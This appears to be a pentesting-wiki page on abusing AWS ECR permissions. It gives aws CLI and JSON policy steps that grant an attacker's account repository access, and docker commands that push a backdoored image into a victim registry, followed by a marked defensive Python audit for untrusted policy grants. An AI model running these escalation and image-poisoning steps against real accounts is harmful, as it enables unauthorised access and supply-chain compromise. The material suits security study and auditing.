# Elastic Container Registry (ECR)

## ecr:SetRepositoryPolicy

With this permission, an attacker can create or modify a repository's resource-based permission policy to grant themselves access, escalating their privileges.

{% code overflow="wrap" %}

```bash
aws --region us-east-1 ecr set-repository-policy --repository-name tyler/my-private-repo --policy-text file://repo_policy.json
```

{% endcode %}

For the repository policy, the attacker could specify either of the following principals:

* `"Principal": "*"` (all AWS principals, i.e. anyone in the world), or
* the ARN of the attacker's own account root user, which in effect grants these permissions to any principal in the attacker's account:

{% code overflow="wrap" %}

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowEveryone",
      "Effect": "Allow",
      "Principal": {
        "AWS": [
          "arn:aws:iam::<attacker-aws-account-id>:root"
        ]
      },
      "Action": [
        "ecr:PutImage",
        "ecr:DescribeImages",
        "ecr:ListImages",
        "ecr:DescribeRepositories",
        "ecr:GetAuthorizationToken"
      ]
    }
  ]
}
```

{% endcode %}
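As an added defensive example (not part of the original page): a small Python audit that parses a repository policy like the one above and flags every Allow statement whose principal falls outside a trusted set of account ids, which is how an `ecr:SetRepositoryPolicy` change of this kind would surface in a review. `SAMPLE_POLICY` is constructed here; 111111111111 is the registry owner account from this page and 999999999999 stands in for the `<attacker-aws-account-id>` placeholder.

```python
import json
import re

# Constructed sample: 111111111111 is the registry owner from the page, 999999999999 a fake outsider.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AllowEveryone", "Effect": "Allow",
         "Principal": {"AWS": ["arn:aws:iam::999999999999:root"]},
         "Action": ["ecr:PutImage", "ecr:DescribeImages"]},
        {"Sid": "InternalPull", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111111111111:role/ci-runner"},
         "Action": ["ecr:BatchGetImage"]},
        {"Sid": "WorldPull", "Effect": "Allow", "Principal": "*",
         "Action": "ecr:GetDownloadUrlForLayer"},
    ],
})

ACCOUNT_RE = re.compile(r"^arn:aws:iam::(\d{12}):")

def principal_accounts(principal):
    """Account ids named by a Principal element; '*' marks a world grant.
    Only the "AWS" principal type is inspected (Service/Federated are ignored)."""
    if principal == "*":
        return {"*"}
    if not isinstance(principal, dict):
        return set()
    values = principal.get("AWS", [])
    values = [values] if isinstance(values, str) else values
    accounts = set()
    for v in values:
        if v == "*" or (v.isdigit() and len(v) == 12):  # world, or bare account-id form
            accounts.add(v)
        else:
            m = ACCOUNT_RE.match(v)
            accounts.add(m.group(1) if m else v)  # keep unparseable values visible
    return accounts

def find_untrusted_grants(policy_text, trusted_accounts):
    """(Sid, principal, actions) for each Allow statement reaching outside trusted_accounts."""
    findings = []
    for stmt in json.loads(policy_text).get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        for acct in sorted(principal_accounts(stmt.get("Principal", {}))):
            if acct not in trusted_accounts:
                findings.append((stmt.get("Sid", "<no Sid>"), acct, tuple(actions)))
    return findings
```

Run against the live policy text from `aws ecr get-repository-policy`, the same check flags both the attacker-account grant and any world-readable statement while leaving in-account roles alone.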

***

## ecr:PutImage

With this permission, an attacker could push a compromised image, e.g. one containing a backdoor or one that sends data back to a C&C (command and control) server.

{% code overflow="wrap" %}

```bash
docker tag attacker-compromised-ubuntu:latest 111111111111.dkr.ecr.us-east-1.amazonaws.com/tyler/my-private-registry:ubuntu-latest

docker push 111111111111.dkr.ecr.us-east-1.amazonaws.com/tyler/my-private-registry:ubuntu-latest
```

{% endcode %}
